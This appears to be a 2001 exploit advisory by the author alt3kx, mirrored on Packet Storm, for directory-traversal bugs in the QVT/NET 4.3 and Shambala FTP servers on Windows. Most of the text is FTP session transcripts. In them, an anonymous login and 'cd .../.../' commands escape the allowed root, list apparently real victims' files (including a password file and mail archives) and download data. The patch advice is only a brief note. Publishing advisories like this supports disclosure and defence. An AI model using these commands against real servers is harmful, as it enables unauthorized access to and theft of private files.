The QVT/NET 4.3 FTP Server and the Shambala FTP Server for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to see and retrieve any file on the server. Exploit information included.
40f5fee603c5fb9de026a015b88a134d7d3e0fdf79a92fe4ca6eb6a136c06883
======================================================================
QVT/NET 4.3 FTP server Directory Traversal
Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x no rulas wey!
======================================================================
------------------------=[Brief Description]=-------------------------
QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.
----------------------------=[Plataforms]=-------------------------------
Windows 9.x
Windows NT
windows 2000
-----------------------------=[Summary]=---------------------------------
When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.
EXploit:
C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.
SO THE BUG... ...
ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins
.
.
.
.
-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106)
(168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.
C:\>type raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
C:\>
-------------------------------=[Patch]=---------------------------------
The recomended action is to changue the persmissions or define
individual directory for users anonymous with files no compromise.
-------------------------=[Company Compromise]=--------------------------
Company:
http//www.qpc.com
======================================================================
Shambala FTP server Directory Traversal
Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org
Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d
vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------
Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.
----------------------------=[Plataforms]=-----------------------------
Windows 9.x
Windows NT
windows 2000
-----------------------------=[Summary]=---------------------------------
When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.
Exploit:
alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55
index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08
index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_-1_0_-11.htm
226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>
EXPLOIT... ...
ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05
MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50
passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>
ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6
Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe
.
.
.
.
.
---------- owner group 168 21-maj-01 19:07
raza-alt3kx.txt
ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.
alt3kx@machine:/tmp$ cat raza-alt3kx.txt
Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>
alt3kx@machine:/tmp$
-------------------------------=[Patch]=------------------------------
The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.
-------------------------=[Company Compromise]=-----------------------
http://www.evolvable.com
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed